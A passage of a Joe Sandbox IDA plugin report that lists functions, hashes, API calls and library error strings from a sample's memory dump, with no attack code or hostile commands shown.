Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 1735018483-3788999226
Opcode ID: 50909f99553fd9387c4686931e2f100db827540b79efbe6985c880bb37d1f750
Instruction ID: 5124323cb47a9f8d11a4c9d1abbf7232d13c1ef9f9572d170415947359a9b9ec
Opcode Fuzzy Hash: 50909f99553fd9387c4686931e2f100db827540b79efbe6985c880bb37d1f750
Instruction Fuzzy Hash: 46313971A052069FCB24DF58D980A9EB3B0FB45354F204B39E9259BB80DB72FD04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C905810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C90584D

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

VariantClear.OLEAUT32(00000000), ref: 6C905899

Strings

vector<T> too long, xrefs: 6C905848

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 2677079660-3788999226
Opcode ID: 648d0eb6fc71c1e4ba8e91113764f8f1fa8cca334273396be32b33d1901ebbe7
Instruction ID: 1a59051970ef88a8c441ef5245ec5723b4314b96485f741c4705e46e013bba6f
Opcode Fuzzy Hash: 648d0eb6fc71c1e4ba8e91113764f8f1fa8cca334273396be32b33d1901ebbe7
Instruction Fuzzy Hash: 6721B372B006099FD710CF69C880A6EB7F9FF95324F244A2EE865E3B40D730E9408B90

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F5750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C8F576B

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

std::_Xinvalid_argument.LIBCPMT ref: 6C8F5782

Strings

string too long, xrefs: 6C8F5766, 6C8F577D

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 77cdf9eb1c9411e78495a7e2dae1640d7071ff5d0a91c905b99b3cb8aada50b8
Instruction ID: 4420259cf9fd771ebbc19ea97ab41a3477800fb44f8d06c76d61219bf060a9f1
Opcode Fuzzy Hash: 77cdf9eb1c9411e78495a7e2dae1640d7071ff5d0a91c905b99b3cb8aada50b8
Instruction Fuzzy Hash: E211B7333047149FD331DA5CA980A6AF7EDEBA6665F204A2FE562C7E40C771980587A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E46B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C8E46C4

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

_memmove.LIBCMT ref: 6C8E470B

Strings

string too long, xrefs: 6C8E46BF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 1785806476-2556327735
Opcode ID: 7fcd1c39df8997747fd5b3108c461ba6b2ff166c5ad2d481030dc2b23e1b37fa
Instruction ID: e5f832a56e6e1f8ff1873d1081bd85844a9d7ac4847057adc0761174fb9c9da6
Opcode Fuzzy Hash: 7fcd1c39df8997747fd5b3108c461ba6b2ff166c5ad2d481030dc2b23e1b37fa
Instruction Fuzzy Hash: 9211E9321043145FF7309DB9ADC0A6AB7A8AFE7318F244F2ED49B83E81D721E4488791

Uniqueness

Uniqueness Score: -1.00%

Function 6C914D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

__CxxThrowException@8.LIBCMT ref: 6C914E00

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Strings

OutputBuffer, xrefs: 6C914D77
ArraySink: missing OutputBuffer argument, xrefs: 6C914D91

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
API String ID: 3718517217-3781944848
Opcode ID: ebb5b6fa659c0c3d6768cee5aa05254ea8dc7a2869d838c027788b696be1098d
Instruction ID: e9e5637fdd9b32a23629e83f9fd1c8e6c4673d42a96012014bd391c6d5a9e1e1
Opcode Fuzzy Hash: ebb5b6fa659c0c3d6768cee5aa05254ea8dc7a2869d838c027788b696be1098d
Instruction Fuzzy Hash: 5F3118755083809FD310CF69C490A9ABBE4BBDA714F508E2EF5A593B90DB74D508CF52

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F0150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

__CxxThrowException@8.LIBCMT ref: 6C8F0201

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Strings

OutputStringPointer, xrefs: 6C8F018C
StringSink: OutputStringPointer not specified, xrefs: 6C8F019B

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
API String ID: 3718517217-1331214609
Opcode ID: cc9d6ea9175f9dfcfadf9602e885a9b5a59b6c72c8ad628df377d165a4c06e0c
Instruction ID: 46876f391c595fbd3162187009dbef89fffd25c4d0311d332d4a59f03090fc9d
Opcode Fuzzy Hash: cc9d6ea9175f9dfcfadf9602e885a9b5a59b6c72c8ad628df377d165a4c06e0c
Instruction Fuzzy Hash: 64216A71D04288AFDB14CFE9D990BDDFBB4EB59204F10862AE825A7B91DB359608CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E4620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C8E4636

Part of subcall function 6C949125: std::exception::exception.LIBCMT ref: 6C94913A
Part of subcall function 6C949125: __CxxThrowException@8.LIBCMT ref: 6C94914F
Part of subcall function 6C949125: std::exception::exception.LIBCMT ref: 6C949160

_memmove.LIBCMT ref: 6C8E466F

Strings

invalid string position, xrefs: 6C8E4631

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 9905e29cd82d68b31ae862514a7d32c10af4f11a16eb6f3e5eff29c4043a6475
Instruction ID: 24459dbe27d4943f8773607850d8449278da66bdb28bd7f0e07685b48ba00511
Opcode Fuzzy Hash: 9905e29cd82d68b31ae862514a7d32c10af4f11a16eb6f3e5eff29c4043a6475
Instruction Fuzzy Hash: 9801DB313042408BE3308EDCDEC0A5AB3AAEBDA714B244D2DD199CBF11D6B1DC4183A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C91ACA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6C91ACF8

Strings

PublicExponent, xrefs: 6C91AD1F
Modulus, xrefs: 6C91AD30

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: type_info::operator!=
String ID: Modulus$PublicExponent
API String ID: 2241493438-3324115277
Opcode ID: ff2e266ef4f00cb90c3b371d5a70f8b539f5bc8a54dedbc1d3909af7ed5ed93e
Instruction ID: 7e08c0a85d38a2c581df7c87a4628fe2335f1f38586659a0ff65d80b1b224c9a
Opcode Fuzzy Hash: ff2e266ef4f00cb90c3b371d5a70f8b539f5bc8a54dedbc1d3909af7ed5ed93e
Instruction Fuzzy Hash: C111CE709193089EC300DF79894258BBBE4AFE6668F00466EF4855BB60DB30DD8CCB96

Uniqueness

Uniqueness Score: -1.00%

Function 6C93B7F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6C93B848

Strings

PublicExponent, xrefs: 6C93B86F
Modulus, xrefs: 6C93B880

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: type_info::operator!=
String ID: Modulus$PublicExponent
API String ID: 2241493438-3324115277
Opcode ID: 09898e14c9dde9a6be2c7b6926222cdaf7b99700bdbb19487887dbb5ade0cffc
Instruction ID: 2e00e42dcf90a36c336a134331dda8a6741dcd07272987d73b536ea48dea002e
Opcode Fuzzy Hash: 09898e14c9dde9a6be2c7b6926222cdaf7b99700bdbb19487887dbb5ade0cffc
Instruction Fuzzy Hash: 2F11CE309093449EC700DF7D884158ABBF8AFE6248F001A6EF8895BB50DB30D988CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6C91B5F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C91B605

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

_memmove.LIBCMT ref: 6C91B634

Strings

vector<T> too long, xrefs: 6C91B600

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: c058cae777272ed5b9999954c4541ae21eb9d431b6909ddd56b51da7c8e20fa9
Instruction ID: 2f1bfdfb25f96d7d76a640ce8e98007fab0d0df4634778275cdfabb4b93d28b2
Opcode Fuzzy Hash: c058cae777272ed5b9999954c4541ae21eb9d431b6909ddd56b51da7c8e20fa9
Instruction Fuzzy Hash: 6901D8B15002098FC324CEA8DCC5C67B3ECEB742547158A2DD45BC3B50E630F804CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6C944230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C944241

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

_memmove.LIBCMT ref: 6C944277

Strings

vector<bool> too long, xrefs: 6C94423C

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<bool> too long
API String ID: 1785806476-842332957
Opcode ID: f1ef29aede864091a456cc24b7f219633ff9902c3ca4ba444ac13e42c6c211e8
Instruction ID: d22018b008b6fd012e54f8849c8bb6947912d667c65d86e70858cf712d58425c
Opcode Fuzzy Hash: f1ef29aede864091a456cc24b7f219633ff9902c3ca4ba444ac13e42c6c211e8
Instruction Fuzzy Hash: A701F272A001055FD714CFA9DCD08AEF3ADFB94358F51832AE52687E44E730E908CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C943840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C943855

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

_memmove.LIBCMT ref: 6C943880

Strings

vector<T> too long, xrefs: 6C943850

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 0faa4e30e8f890938c82254c0d1df05f66a60a89ab95a90c31802ed8bf1b0edc
Instruction ID: 4e2a35e1d2fa5c207ec7ab168ad15bbcb19ec222ab98f9b2e0c377f55ec05a08
Opcode Fuzzy Hash: 0faa4e30e8f890938c82254c0d1df05f66a60a89ab95a90c31802ed8bf1b0edc
Instruction Fuzzy Hash: 850184715016099FD324DFB9DD848ABF3ECEF642147118A3DE5AAD3B50EA70F8048B60

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F5160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C8F5173

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

_memmove.LIBCMT ref: 6C8F519E

Strings

vector<T> too long, xrefs: 6C8F516E

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 73e6844ce307b09edbf8afad10386c9059f10fac5ceff4c82025fe957e6ff296
Instruction ID: 7887d894d542cc1ac0640e9061169209bd8cdd862ca1e1867eb4eaeb006f8f14
Opcode Fuzzy Hash: 73e6844ce307b09edbf8afad10386c9059f10fac5ceff4c82025fe957e6ff296
Instruction Fuzzy Hash: 370162B16002099FD738CEA8CDD186BB7EDEB642547158A2DE86AC3B40E731F945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6C94BFB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6C94ABC3: __getptd.LIBCMT ref: 6C94ABC9
Part of subcall function 6C94ABC3: __getptd.LIBCMT ref: 6C94ABD9

__getptd.LIBCMT ref: 6C94BFC3

Part of subcall function 6C94EAE6: __getptd_noexit.LIBCMT ref: 6C94EAE9
Part of subcall function 6C94EAE6: __amsg_exit.LIBCMT ref: 6C94EAF6

__getptd.LIBCMT ref: 6C94BFD1

Strings

csm, xrefs: 6C94BFDF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

